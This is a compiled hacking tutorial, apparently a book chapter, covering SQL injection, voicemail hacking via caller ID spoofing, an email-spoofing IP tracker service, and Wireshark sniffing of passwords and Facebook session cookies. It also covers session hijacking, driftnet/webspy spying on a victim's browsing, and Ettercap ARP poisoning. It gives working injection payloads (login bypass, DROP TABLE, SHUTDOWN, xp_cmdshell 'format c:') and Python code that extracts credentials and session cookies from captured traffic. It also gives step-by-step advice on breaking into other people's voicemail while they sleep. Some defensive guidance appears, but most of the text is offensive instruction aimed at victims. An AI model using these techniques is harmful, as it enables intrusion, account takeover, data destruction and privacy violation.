Power of hacking (part3)

Page 1

Power Of Hacking
Mail: mtahirzahid@yahoo.com

SQL Injection: Can you describe, in detail, how to do a SQL Injection?

SQL Injection is an attack method that targets the data residing in a database behind the firewall that shields it. It attempts to modify the parameters of a Web-based application in order to alter the SQL statements that are built to retrieve data from the database. Naturally, the first step is to uncover any Web applications that are vulnerable to the attack. The attack takes advantage of poor code and poor Web site administration. In SQL injection, user-controlled data is placed into a SQL query without being validated for correct format or for embedded quote and escape characters. It affects the majority of applications that use a database backend and do not validate the type and content of their variables. It is estimated that at least 50% of the large e-commerce sites and about 75% of the medium-to-small sites are vulnerable to this attack. The dominant cause is improper validation in CFML, ASP, JSP and PHP code.

Attackers uncover susceptible Web applications by looking at Web pages for anything resembling an ID number, category or name that is passed as a parameter. The attacker may sift through every kind of variable, as well as cookies: many times, session cookies are stored in a database and are passed into SQL queries with little or no format checking. They may try placing various strings into form fields and query variables. Typically, someone looking for SQL injection will start with single and double quotes and then try parentheses and other punctuation characters. The response they are looking for is anything signifying an error.

OLE DB Errors

User-supplied values are enclosed in single quotation marks (') inside the query, so a simple test is to submit a lone single quote (') as the username. If the form is vulnerable to SQL injection, the quote produces an OLE DB error, and you can then move on to SQL injection proper.

Example: the attacker starts by entering a single quote in the "User ID" field of the login page. It returns an error, just as they wanted:

    Error Type:
        Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
        [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
        /corner/asp/checklogin1.asp, line 7
    Browser Type:
        Mozilla/(version) (compatible; MSIE 6.0; Windows NT 5.0)
    Page:
        POST 36 bytes to /corner/asp/checklogin1.asp
    POST Data:
        userid=%27&userpwd=%27&Submit=Submit

This output is the first lead the attacker can use. He has a far better chance of succeeding if he can find out which database he is up against, and the error already names the driver (ODBC SQL Server Driver), so the backend is Microsoft SQL Server. The process of mapping out the database and its tables is called "database footprinting."



Identifying the configuration of the server is crucial in deciding how the site will be attacked. The method chosen depends on how poorly the server has been configured. From the error shown above, it is clear that the site is using SQL Server. Note that SQL injection is an attack on the Web application, not on the Web server or on services running in the OS.

It is typical for an HTML page to use the POST method to send parameters to another ASP page. A closer look at the page source reveals the FORM tag:

    <form name="form1" method="post" action="checklogin1.asp">

Let's examine the implications. Exploits occur due to coding errors and inadequate validation checks. Often the emphasis is on acquiring an input and delivering a suitable output; any Web application that does not check the validity of its input is exposed to the attack.

Login script

The login page at site.com/login.htm is based on this code:

    <form action="checklogin.asp" method="post">
    Username: <input type="text" name="user_name"><br>
    Password: <input type="password" name="pwdpass"><br>
    <input type="submit">
    </form>

The form posts to checklogin.asp, where we find the following code:

    Dim p_struser, p_strpass, objRS, strSQL
    p_struser = Request.Form("user_name")
    p_strpass = Request.Form("pwdpass")
    ' The user input is concatenated straight into the SQL text
    strSQL = "SELECT * FROM tblUsers " & _
             "WHERE user_name='" & p_struser & "' and pwdpass='" & p_strpass & "'"
    Set objRS = Server.CreateObject("ADODB.Recordset")
    objRS.Open strSQL, "DSN=..."
    If (objRS.EOF) Then
        Response.Write "Invalid login."
    Else
        Response.Write "You are logged in as " & objRS("user_name")
    End If
    Set objRS = Nothing



At a cursory glance, this code looks fine and does what it is supposed to do: check for a valid username and password, and let the user into the site if the credentials are valid. However, note that the user input from the form is used directly to build the SQL statement. There is no validation of the nature of the input at all, which hands control of the query to anyone who wants to reach the database. For instance, if the attacker enters

    ' or ''='

in both the username and the password fields, the statement sent to the database becomes

    SELECT * FROM tblUsers WHERE user_name='' or ''='' and pwdpass='' or ''=''

The WHERE clause is true for every row, so the query returns all users in the table, and the script logs the attacker in as the user in the first record returned. It is quite probable that the first user is the superuser or the administrator. Since the form does not check for special characters such as the single quote, the attacker is able to use them to break out of the string literal.

For the sake of clarity, let's look at a more defensive version of the code. Note the use of the Replace function to double any single quote in the input, so that it stays inside the string literal (the fragment starts inside an If/Else block whose beginning is not shown):

    <%
    Else
        strSQL = "SELECT * FROM tblUsers " _
               & "WHERE username='" & Replace(Request.Form("usr_name"), "'", "''") & "' " _
               & "AND password='" & Replace(Request.Form("pwdpass"), "'", "''") & "';"
        Set Login = Server.CreateObject("ADODB.Connection")
        Login.Open("DRIVER={Microsoft Access Driver (*.mdb)};" _
                 & "DBQ=" & Server.MapPath("login.mdb"))
        Set rstLogin = Login.Execute(strSQL)
        If Not rstLogin.EOF Then
    %>

SQL Server, among other databases, delimits statements with a semicolon. The semicolon allows multiple statements to be submitted as one batch and executed in sequence. For example, the input

    Username: ' or 1=1; drop table users; --

turns the query into two statements: the first selects the username field for every row in the users table, and the second deletes the users table. Everything after the -- is a comment, so the remainder of the original query is ignored.
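The login bypass and the batch attack described above, rebuilt as an added example that is not part of the original article. It uses Python's sqlite3 module so it runs offline; executescript() stands in for a SQL Server batch, because SQLite's execute() accepts only one statement. It also exercises the stripQuotes and killChars filters that the Preventing Attacks section proposes later, alongside a parameterised query, and shows the inputs those filters miss. The table, its rows, the blacklist port and every function name are constructed for this demo.

```python
"""Added example (not from the original article): checklogin.asp's query
rebuilt in Python on an in-memory SQLite database, so the login bypass,
the batch attack and the article's countermeasures can be run offline.
Table name, rows and function names are constructed for this demo."""
import sqlite3

# killChars blacklist from the article's Preventing Attacks section.
BAD_WORDS = ["select", "drop", ";", "--", "insert", "delete", "xp_"]

# Query from the article's stripQuotes/killChars walkthrough.
ARTICLE_QUERY = ("select prodName from products where id=1; "
                 "xp_cmdshell 'format c: /q /yes'; drop database targetDB --")


def make_db() -> sqlite3.Connection:
    """Constructed tblUsers; the administrator is deliberately the first row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE tblUsers (user_name TEXT, pwdpass TEXT);"
        "INSERT INTO tblUsers VALUES ('admin', 'S3cret!');"
        "INSERT INTO tblUsers VALUES ('alice', 'wonderland');"
    )
    return conn


def build_query(user: str, pwd: str) -> str:
    """String concatenation, exactly the way checklogin.asp builds strSQL."""
    return ("SELECT user_name FROM tblUsers WHERE user_name='" + user
            + "' AND pwdpass='" + pwd + "'")


def login_vulnerable(conn, user, pwd):
    """Return the first matching user_name, or None when objRS.EOF would be true."""
    row = conn.execute(build_query(user, pwd)).fetchone()
    return row[0] if row else None


def login_batch(conn, user, pwd) -> bool:
    """Same concatenated query handed to executescript(), which, like a SQL
    Server batch, runs every ';'-separated statement in turn. Returns
    whether tblUsers still exists afterwards."""
    conn.executescript(build_query(user, pwd))
    count = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE name='tblUsers'").fetchone()[0]
    return count == 1


def strip_quotes(s: str) -> str:
    """The article's stripQuotes: Replace(strWords, "'", "''")."""
    return s.replace("'", "''")


def kill_chars(s: str) -> str:
    """The article's killChars: one pass deleting each blacklisted token."""
    for bad in BAD_WORDS:
        s = s.replace(bad, "")
    return s


def sanitize(s: str) -> str:
    """stripQuotes followed by killChars, the order the article uses."""
    return kill_chars(strip_quotes(s))


def login_escaped(conn, user, pwd):
    """checklogin.asp with the article's quote-doubling fix applied."""
    return login_vulnerable(conn, strip_quotes(user), strip_quotes(pwd))


def login_safe(conn, user, pwd):
    """Parameterised query: values travel separately from the SQL text."""
    row = conn.execute(
        "SELECT user_name FROM tblUsers WHERE user_name=? AND pwdpass=?",
        (user, pwd)).fetchone()
    return row[0] if row else None


def filter_bypasses() -> dict:
    """Inputs that killChars/stripQuotes let through unchanged, or rebuild."""
    return {
        "nested": kill_chars("selselectect"),     # deleting the inner 'select' leaves 'select'
        "case": kill_chars("SELECT"),             # Replace() and str.replace() are case-sensitive
        "numeric": sanitize("1 or 1=1"),          # unquoted id parameter: nothing to strip
        "collateral": sanitize("dropdown menu"),  # legitimate text is mangled too
    }


def run_demo() -> dict:
    """Run the login variants against the same payloads; keys name each case."""
    bypass = "' or ''='"
    conn = make_db()
    results = {
        "normal": login_vulnerable(conn, "alice", "wonderland"),
        "bypass_vulnerable": login_vulnerable(conn, bypass, bypass),  # logs in as 'admin'
        "bypass_escaped": login_escaped(conn, bypass, bypass),        # None: no row matches
        "bypass_safe": login_safe(conn, bypass, bypass),              # None: literal comparison
    }
    # Batch attack from the article, run last because it drops the table.
    results["table_survives_batch"] = login_batch(
        conn, "' or 1=1; DROP TABLE tblUsers; --", "anything")
    return results
```

Run run_demo() and filter_bypasses() from a Python shell: the doubled quote keeps the bypass string inside the literal, but a numeric context such as id=1 has no quote to double, and one pass of keyword removal can be defeated by nesting the keyword inside itself. The parameterised form is the only variant that needs no knowledge of which characters are dangerous.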



Login Guessing and Insertion

Login guessing and insertion is another approach. The attacker can try to log in without a password; typical "usernames" are expressions such as 1=1 or any text wrapped in single quotes. The most common problem seen on Microsoft SQL Server boxes is the default blank sa password.

The attacker can try to guess the username of an account by querying for similar names (e.g., 'ad%' to match "admin"), and can insert data by appending commands or writing his own queries. If database fingerprinting has shown that the backend is SQL Server, he will try his luck with the default administrative credentials, namely sa with a blank password. Alternatively, he can issue a query that retrieves a valid username; for instance, to find the administrative account he can query for

    users.userName LIKE 'ad%'

If the attacker does not want to log in and only wants to "harvest" the site, he may try to view extra information that is not otherwise available by tampering with a URL such as the one below:

    http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Tools

Here, sCategory is the variable name and Tools is the value assigned to it. The attacker changes this valid URL into:

    http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Kits

If the code underlying the page has a segment like the one below:

    sub_cat = Request("sCategory")
    sqlstr = "SELECT * FROM product WHERE Category='" & sub_cat & "'"
    Set rs = conn.Execute(sqlstr)

then the value Kits taken in by sCategory is assigned to sub_cat and the SQL statement becomes:

    SELECT * FROM product WHERE Category='Kits'

so the output is a result set containing the rows that match the WHERE condition. If the attacker instead appends to the valid URL:

    http://www.example.com/shopping/productdetail.asp?SKU=MS01&sCategory=Tools' or 1=1--

the SQL statement becomes

    SELECT * FROM product WHERE Category='Tools' or 1=1 --'

This leads the query to select everything from the product table, regardless of whether Category equals Tools. The double dash, --, instructs SQL Server to ignore the rest of the line; it is there to neutralise the last hanging single quote ('). On MySQL it is sometimes possible to replace the double dash with a hash, #. If the backend database does not recognise the double dash, the attacker can instead append ' or 'a'='a, which closes the literal cleanly and returns the same result. Depending on the actual SQL query, the variations available to the attacker include:

    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

To use the database for his own ends, the attacker needs to learn more than which database is running at the backend: he has to determine the database structure and its tables. Revisiting our product table, the attacker could try to add rows with a statement such as INSERT INTO product (Category) VALUES ('library'). Suppose he wants to add a description of the files he intends to upload; he first needs to determine the structure of the table. He may be able to do that if error messages are returned to the browser, as they are by default in ASP, and can then read any value accessible to the account the ASP application uses to connect to SQL Server.

Insertion methods vary according to the database at the backend. MS SQL Server is considered the easiest target for SQL insertion. Oracle has no native command execution capability. Sybase is similar to MS SQL, although with fewer stored procedures, and its command execution is disabled by default. Older MySQL is very limited in scope: subselects are possible only in newer versions, and the common drivers accept only one SQL statement per query.

One of SQL Server's most powerful commands is SHUTDOWN WITH NOWAIT, which shuts the server down immediately, stopping the Windows service; after it is issued the service must be restarted manually by the administrator. The default installation of SQL Server has the system administrator account sa, which holds every privilege. An attacker who stumbles across this account while harvesting Web sites can use it to run any command, delete, rename and add databases, tables and triggers, and more. One of the attacks he can carry out when he is done with the site is a denial of service (DoS) by shutting SQL Server down. At an input form such as a login that is susceptible to SQL injection, the attacker submits:

    Username: '; shutdown with nowait; --
    Password: Anything

This makes our login.asp script run the following query:

    select userName from users where userName=''; shutdown with nowait; --' and userPass='Anything'

The -- sequence is the single-line comment marker in Transact-SQL, and ; marks the end of one statement and the beginning of another. If the application connects as sa, or the attacker has otherwise acquired the required privileges, the SQL Server will shut down and require a restart.

Stored Procedures

There are several extended stored procedures that can cause permanent damage to a system.



We can execute an extended stored procedure through our login form by injecting the call as the username:

    Username: '; exec master..xp_xxx; --
    Password: Anything

    Username: '; exec master..xp_cmdshell 'iisreset'; --
    Password: Anything

A stored procedure is a collection of SQL statements that can be treated as a single function. It is similar to a batch file: both are text consisting of commands, and both run when invoked by name. An extended stored procedure (XP) takes the notion one step further. Where stored procedures consist of SQL text, XPs are written in higher-level languages such as C and compiled into DLLs; stored procedures consist primarily of SQL commands, while XPs can provide entirely new functions through their code. An attacker can take advantage of an extended stored procedure by entering a suitable command, which is possible whenever there is no proper input validation.

xp_cmdshell is a built-in extended stored procedure that executes arbitrary command lines. For example,

    exec master..xp_cmdshell 'dir'

returns a directory listing of the current working directory of the SQL Server process. In this example, the attacker enters the following into a search form:

    ' exec master..xp_cmdshell 'product handycam /DELETE' --

When the query string is assembled and sent to SQL Server, the server processes:

    SELECT * FROM PTable WHERE input_text='' exec master..xp_cmdshell 'product handycam /DELETE' --'

The first single quote entered by the user closes the string, and SQL Server executes the remaining statements in the batch, including the command that deletes the product from the product table. The advantage of this method for the attacker is that the DLL behind the extended procedure only needs to exist on a machine reachable by the SQL Server, not on the Web server.

Server Talks

The following, injected through the same form, uses the speech.voicetext COM object to make the SQL Server machine speak:

    admin'; declare @o int, @ret int
    exec sp_oacreate 'speech.voicetext', @o out
    exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
    exec sp_oasetproperty @o, 'speed', 150
    exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
    waitfor delay '00:00:05'--

An attacker can leverage the built-in extended stored procedures that SQL Server provides for ActiveX Automation (sp_oacreate, sp_oamethod, sp_oasetproperty) to script COM objects from Transact-SQL, much as an ASP or WSH script written in VBScript or JScript would. Example 2 is the same automation script on its own, without the injection prefix:

    declare @o int, @ret int
    exec sp_oacreate 'speech.voicetext', @o out
    exec sp_oamethod @o, 'register', NULL, 'foo', 'bar'
    exec sp_oasetproperty @o, 'speed', 150
    exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to us', 528
    waitfor delay '00:00:05'

Preventing Attacks



    "Minimize the privileges of the database connection!"
    "Disable verbose error messages!"
    "Protect the system account sa!"
    "Audit the source code!"
    "Escape single quotes!"
    "Allow only good input!"
    "Reject known bad input!"
    "Restrict the length of input!"
    And finally, "Update the database, and back it up!"

The majority of injection attacks rely on a single quote to terminate a string expression. By using a simple replace function that converts every single quote into two single quotes, you greatly reduce the chance of an injection attack succeeding in a string context. In ASP it is a simple matter of creating a generic replace function that handles the single quotes automatically:

    function stripQuotes(strWords)
        stripQuotes = replace(strWords, "'", "''")
    end function

Now, if the input is run through stripQuotes before our first query is built, the statement goes from this:

    select count(*) from users where userName='alice' and userPass='' or 1=1 --'

to this:

    select count(*) from users where userName='alice' and userPass=''' or 1=1 --'

This stops the injection, because the doubled quote keeps the attacker's text inside the string literal, and the WHERE clause once again requires both userName and userPass to match.

Note that quote doubling only protects values that the query encloses in quotes. A numeric parameter such as id=1 is placed in the query without quotes, so an input of 1 or 1=1 contains nothing for stripQuotes to change. The robust fix is to pass every value through a parameterised query (an ADODB.Command with Parameters in classic ASP) and to check that numeric inputs are numeric before use.

Another countermeasure is to remove culprit characters and character sequences. Certain sequences, such as --, select, insert and xp_, can be used to perform an SQL injection attack. Removing them from user input before we build a query reduces the chance of an injection even further. As with the single quote solution, we just need a basic function to handle this:

    function killChars(strWords)
        dim badChars
        dim newChars
        badChars = array("select", "drop", ";", "--", "insert", "delete", "xp_")
        newChars = strWords
        for i = 0 to uBound(badChars)
            newChars = replace(newChars, badChars(i), "")
        next
        killChars = newChars
    end function

Using stripQuotes in combination with killChars greatly reduces the chance of an SQL injection attack succeeding. So if the query

    select prodName from products where id=1; xp_cmdshell 'format c: /q /yes'; drop database targetDB --

is run through stripQuotes and then killChars, it ends up looking like this:

    prodName from products where id=1 cmdshell ''format c: /q /yes'' database targetDB

which is useless as SQL and returns no records. Bear in mind that a blacklist of this kind is easy to bypass and also mangles legitimate input: replace is case-sensitive by default, so SELECT passes through untouched; removing select from selselectect leaves select; and a product description containing the word "dropdown" becomes "down". Treat killChars as defence in depth, not as the primary control.

Keeping all text boxes and form fields as short as possible reduces the number of characters available to formulate an injection. Additional countermeasures include checking data types and using the POST method, where possible, to submit forms.

Conclusion

SQL injection is an attack methodology that targets the data residing in a database through the firewall that shields it. It attempts to modify the parameters of a Web-based application in order to alter the SQL statements built to retrieve data from the database. Database footprinting, the process of mapping out the tables in the database, is a crucial tool in the hands of an attacker. Exploits occur due to coding errors as well as inadequate validation checks. Prevention involves enforcing better coding practices and database administration procedures. You have now read this article, and I hope it gave you a deeper understanding of today's state of Web security and attacks. Remember: always patch and update holes, because these and other exploits are common, and attackers are not going to wait. Thank you all for reading, and continue to show your support for Hackers Centre by spreading the good word about our site!

Hacking Cell Phone Voicemails

Is hacking a cell phone harder than hacking a computer? Hacking someone else's cell phone voicemail is the easiest hacking you will ever attempt. You don't even have to be a hacker!

What hardware or software do I need? You don't need a computer or software. You don't need to know anything about computers. All you need is a caller ID spoofing account from a company like SPOOFEM.COM.

What is caller ID spoofing? Caller ID spoofing allows you to call any number and have any number you choose show up on the called person's caller ID. For example, you can call someone who is on vacation and have their home phone number show up on their cell phone's caller ID.

How do I hack a voicemail box? When you check your voicemail from your cell phone, it calls your carrier's network, which recognizes your phone and puts you straight into your voicemail if your account is set up so that no passcode is required when calling from your own phone. So if you spoof the target's own cell number as your caller ID and dial into their voicemail, the network treats the call as coming from their phone. Believe it or not, there are over eighty million people in the United States who do not have the passcode turned on when they call from their cell phone.

Does it work with any kind of phone? It is not the type of phone you have that matters, but your cell phone carrier. It has been tested with Sprint, Nextel, Verizon, T-Mobile and AT&T Wireless, and it even works perfectly with Apple's iPhone!



When you set up voicemail on your iPhone, you do not have to call into the cell phone network. The iPhone asks you two simple questions when you first configure it; the first, when you record your greeting, is "What do you want your passcode to be?" The iPhone never gives you the option to require the passcode when checking voicemail on the phone itself; that is because it uses Visual Voicemail, so it is always checking with the carrier to see whether there are any messages on the carrier's network.

Are there any keys I need to press? Yes... and no. Some carriers will put you right into voicemail. Others may require you to hit the "*" or "#" key.

I tried that, but the person keeps picking up the phone. What happened? It only works if the person does not answer the phone. If someone picks up, you are not being sent to voicemail, so it is best to try when the person is least likely to answer. Good times are when you know the person is asleep, at the movies, in church or at work, and not using the phone. Please note that when you call someone with their own cell phone number in the caller ID, they will be suspicious and will most likely answer. If they do, hang up so they will not know it was you calling.

What is the best service for this? My favorite caller ID spoofing service is SPOOFEM.COM, not because I own the company, but because it is the easiest service, with the most features. You can record the call, which I recommend if you are checking a person's voicemail; that way, you do not need to keep listening to the messages over and over.

What else can I use a telephone spoofing service for? Caller ID spoofing is perfect for social engineering. You can call someone within a company and use an internal number as your caller ID, so the call looks as if it is coming from inside the company. For example, you could call Accounting and have the IT department's number show up on the caller ID. You could then use your social engineering skills to get the information you are looking for.

How to Become a Hacker in Fifteen Minutes

The explosion of Web development languages such as Java, Ajax and PHP has allowed developers to build all the security tools you would need to perform a penetration test right into a Web site. One such site, www.LIGATT.com, offers the LIGATT Security Suites, which can perform:

    Port scan / vulnerability check
    Spoof emails to get someone's IP address
    Caller ID spoofing
    Penetration testing
    Set up trip wires
    Monitor an IP address
    And more.

The following tools, used in "How to become a hacker in 15 minutes," are part of the LIGATT Security Suites.

Step one: get the person's IP address. IPSNITCH is two programs in one. The first is email spoofing, which lets you send an email to anyone and make it appear to have come from someone else. The second gets you anyone's IP address. With IPSNITCH, all you need is the email address of the person you are targeting. IPSNITCH lets you send that person an email that looks as though it came from someone else; when the person opens the email, it automatically reports the person's IP address, and the ISP that owns that address, back to you.

You will be prompted to log in. This login page is shared by IP Snitch and Port Snitch. When you log in, make sure you select the Tattle Tell radio button. Once you are logged into IP Snitch, you are shown the screen in the figure. Your next step is to click the Add Target button, which brings up the form shown in the next figure. Fill in all the fields:

    Notify Email: the address you want the response sent to



    From: the fictitious sender address, chosen from the pull-down menu
    Or Type Your Own: a user-defined sender address, if none of those in the dropdown suits you
    Choose a Subject: a predefined subject from the dropdown box
    Subject: a user-defined subject
    Message box: where you type the message; the maximum is 500 characters

Then submit the email. Once you hit Submit you are redirected back to the main page, which now looks like figure 1.4 and shows a status of "waiting for response." This does not change until the receiver opens the email. When you log back in to check whether the receiver has responded, check the box for the specific targeted email and choose Refresh from the dropdown menu; you can also keep checking the response email. If the user has responded, the page shows the date and time the email was actually opened. Next, log back into IP Snitch, select the targeted email you want information on, and choose Purchase Report from the dropdown menu. Then select the report you want and choose View Map from the dropdown menu to get a map view of the general location of that IP address.

Background check and vulnerability check all in one! Here you have the option to run a port scan. With a personal account you can only scan your own IP address; with a business account you can enter any IP address of your choice. The IP address is the only required field, but you can also fill in your own or the target's first name, last name, company, address, city, state, country, zip code, phone number and email address. Hit the Start Scan button to proceed.

Once you submit the information, the computer is scanned. The page refreshes every 3 seconds with an update on the scan status. While the target's computer is being scanned, Port Snitch looks for potential vulnerabilities on that IP address. If no vulnerabilities are found, you do not have to pay for a report. If vulnerabilities are found, a summary is displayed on the screen and you are prompted to purchase the report, which gives detailed information about all of the vulnerabilities on the target's computer, along with any personal information found on the Web, in videos, books, blogs and news articles.

If you choose to purchase it, you can either enter a promotional code (if one applies to you) or click the Purchase Report button. This sends you to a payment screen, or deducts the amount from your LIGATT Security EZPAY account. Once you have paid, the report is emailed to you and is also available when you log into Port Snitch; it stays available online for 7 days. When you return to the home page, all of the reports you have purchased appear at the bottom of the page. Here you can click a link to view them or click the check mark to delete a report.


You’re done.


PC211 is an online penetration testing program. It takes the scan reports from PortSnitch and then tries to exploit (hack) every vulnerability located in the report. Once you have logged into the LIGATT Security Suites, click on the "PC211" logo to reach the PC211 home page, which lists all of your purchased PORTSNITCH reports. To run a PC211 penetration test, simply check the report you want to use and click the "PC211" option under the "Select an option" menu. Once you have clicked "PC211", the penetration test begins. You will see a map of the target and the status of the test. While you wait, there are some YouTube videos on cyberstalking, spyware, wireless hacking and plenty of other network security subjects. If PC211 was able to gain access to the scanned computer, it leaves a file named "LIGATT_SECURITY.txt" in the root directory of the hard drive, stating: "PC211 has broken and entered into your machine. IP Address XX.XX.XX.XX."

When the penetration test is complete, PC211 displays the results on the screen, telling the user whether the system was penetrated or not. You are done.

If you decide to launch PC211 directly from PORTSNITCH, the instructions are slightly different: once you log into the LIGATT Security Suites, click on the "PORTSNITCH" logo instead. When the penetration test is complete, PC211 displays the results on the screen in the same way. You are done.

Sniffing with Wireshark

If you have read the "Network Sniffing" chapter (Chapter 6), you will have seen Wireshark in action, where I demonstrated the TCP/IP three-way handshake and how port scanning works. Wireshark, previously known as Ethereal, is one of the best packet sniffers ever written. It is used not only by hackers and penetration testers but also by network administrators to sort out problems within a network. Since Wireshark is an extensive tool, it is not possible for me to cover every aspect of it in this chapter; instead I will give a quick overview. We will use Wireshark to capture plain text passwords sent across the wire. So let us begin:



Power Of Hacking Step 1—Launch Wireshark by executing “Wireshark” command from the terminal. Once launched, click on the “Capture” button at the top and click on the “Analyze” button. Step 2—Next, select the interface you would like to sniff on and click “Start”; in my case, it is eth0.

Step 3—Wireshark will start capturing all the packets going across the network. On the victim’s machine. I will log into a website that supports http authentication and will stop the capture on my attacker machine once I have logged in. Step 4—Since we have so many packets, we need to ask Wireshark to filter out only HTTP POST requests. So, inside of the filter tab, we will type “http.request.method==POST.”

The first request you see is a “POST” request performed to the destination 75.98.17.25 from our victim, which has a source IP 192.168.75.142. Step 5—Next, we will right-click on the packet and click on “Follow tcp stream,” which will show us the original post request generated from the victim’s browser. The output would

Mail:mtahirzahid@yahoo.com

Page 26


Power Of Hacking look something like the following:

As you can see, the POST request contains the username “admin” and the password “pass.” Wireshark has many display filters for isolating different kinds of traffic; we have already discussed some of them, and I would suggest you take a look at the Wireshark manual available at wireshark.org.

Sniffing Session Cookies with Wireshark
Our next goal is to capture the victim’s session cookies so we can hijack his or her session. Every site has its own session cookie that it uses to authenticate a user. For demonstration purposes, I will capture the session cookies of Facebook, which are c_user and xs.

Note: If the victim has logged out of his or her Facebook account, you will not be able to use the session cookies, since the server invalidates them on logout.

I have already walked you through the process of starting a packet capture inside Wireshark, so I won’t repeat it. Inside Wireshark we apply a display filter that matches HTTP cookies containing the string “c_user” or “xs”, since those are the session cookies (for example, http.cookie contains "c_user"). If you can’t find them, use the plain http.cookie filter and check the cookies manually.

So we have filtered all the HTTP requests containing the cookie named “c_user.” Let’s inspect the first request. On inspecting the HTTP request, we find all the cookies associated with Facebook.

To get a clear view of all the cookies, we right-click on the Cookie field and choose Copy → Bytes → Printable Text Only. Now all the cookies are copied. We will delete the other cookies and keep only the authentication cookies.
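As an added example, not code from the book, the following pulls the same two things out of a raw HTTP request that the Wireshark steps above find by hand: the login fields of a plain-HTTP POST and the session cookies (c_user and xs) from the Cookie header. The request bytes are constructed for the demo after the checklogin1.asp POST and the Facebook cookie names used in this chapter; the username/password field-name hints are a heuristic of mine, not an HTTP rule.

```python
from urllib.parse import parse_qs

# Field-name hints for spotting a login form (a heuristic, not an HTTP rule).
USER_HINTS = ("user", "login", "email", "uid")
PASS_HINTS = ("pass", "pwd", "secret")

# Constructed sample: one login POST as the victim's browser sent it in the clear.
BODY = b"userid=admin&userpwd=pass&Submit=Submit"
SAMPLE_REQUEST = (
    b"POST /corner/asp/checklogin1.asp HTTP/1.1\r\n"
    + b"Host: 75.98.17.25\r\n"
    + b"Cookie: datr=zx9abc; c_user=100000123456; xs=27%3Adeadbeef%3A2%3A1400000000; locale=en_US\r\n"
    + b"Content-Type: application/x-www-form-urlencoded\r\n"
    + b"Content-Length: %d\r\n" % len(BODY)
    + b"\r\n"
    + BODY
)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into method, path, lower-cased headers and body."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete request: end of headers not found")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def parse_cookies(cookie_header):
    """Turn 'a=1; b=2' into a dict; values are kept as sent (not URL-decoded)."""
    jar = {}
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            jar[name] = value
    return jar


def extract_credentials(raw):
    """Return {'path', 'username', 'password'} from a form-encoded login POST, or None."""
    req = parse_http_request(raw)
    if req["method"] != "POST":
        return None
    if not req["headers"].get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    fields = {k.lower(): v[0] for k, v in parse_qs(req["body"].decode("iso-8859-1")).items()}

    def pick(hints, exclude=()):
        for name, value in fields.items():
            if any(h in name for h in hints) and not any(e in name for e in exclude):
                return value
        return None

    user = pick(USER_HINTS, exclude=PASS_HINTS)   # "userpwd" must not be taken as the user field
    password = pick(PASS_HINTS)
    if user is None or password is None:
        return None
    return {"path": req["path"], "username": user, "password": password}


def session_cookies(raw, names=("c_user", "xs")):
    """Return only the cookies that authenticate the session (Facebook's c_user and xs)."""
    req = parse_http_request(raw)
    jar = parse_cookies(req["headers"].get("cookie", ""))
    return {n: jar[n] for n in names if n in jar}


if __name__ == "__main__":
    print(extract_credentials(SAMPLE_REQUEST))
    print(session_cookies(SAMPLE_REQUEST))
```

The two functions are the programmatic form of “http.request.method==POST” plus “Follow TCP Stream” and of the cookie filter: feed them the reassembled request bytes from a capture and they return exactly what the cookie injector needs.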

Hijacking the Session
Now that we have the victim’s authentication cookies, we need to inject these cookies into our browser to hijack the session. Personally, I prefer the “Cookie Manager” add-on for Firefox; it is very simple to use.

Step 1—To inject our cookies, we browse to facebook.com and, from the Tools menu, open the “Cookie Manager” add-on.

Step 2—Once the add-on is launched, we need to inject our cookies. We click on the “Add” button at the bottom and add both of our cookies. Here is an example.

Step 3—Once both of our cookies are injected, we just refresh the page, and we are logged in to our victim’s account.

Sniffing Pictures with Driftnet
If we want to see what the victim is viewing in his browser, we have a great tool called driftnet, which comes preinstalled with BackTrack. We can use it to capture all the images the victim is browsing through. We do this by executing the following command (driftnet listens on the default interface; add -i eth0 to pick a specific one):

root@bt:~# driftnet -v

This is what the output looks like: we can clearly see that the victim is browsing google.com.

The “facebook hacked” image is from my blog, since I accessed my blog from the victim’s browser to demonstrate this tool.

Urlsnarf and Webspy
Urlsnarf and webspy are part of the dsniff toolset; urlsnarf tells us which URLs the victim has visited, whereas webspy opens every web page the victim visits in our own browser.

Here is an example of the attacker running urlsnarf to sniff the URLs that the victim has visited. Webspy works the same way; however, we need to specify additional arguments. Here is how the command looks:

root@bt:~# webspy -i eth0 192.168.75.142

where eth0 is the interface and 192.168.75.142 is the IP address of the victim.

Urlsnarf keeps track of the URLs visited by the victim, and as soon as the victim’s browser connects to a new URL, webspy makes our browser connect to it too, so we know which pages the victim is currently on. As you can see from the above screenshot, the victim (on his machine) has connected to facebook.com, and our browser has automatically opened Facebook.

Types of Sniffing
Sniffing can be divided into two main categories:
1. Active sniffing
2. Passive sniffing

Active Sniffing
Active s niffing is where we directly interact with our target machine by sending packets and requests. ARP spoofing and MAC flooding are common examples. Active sniffing is what we will focus on.

Passive Sniffing
In passive sniffing, the attacker does not interact with the target. They just sit on the network and capture the packets sent and received on it. This works on hub-based networks or wireless networks, where every host can see all the traffic.

ARP Poisoning with Ettercap
Let’s start by performing an ARP poisoning attack with Ettercap. Just follow these steps:

Step 1—Launch ettercap by executing the following command:

root@bt:~# ettercap -G

Step 2—Next, click on the “Sniff” menu at the top, choose “Unified sniffing,” and finally select your appropriate interface.

Step 3—Next, click on “Hosts” at the top and then “Scan for hosts.” It will scan the whole network for all live hosts.

Step 4—Once the scan is complete, from the “Hosts” menu, click on “Hosts list.” It will display all the hosts that it has found within your network.

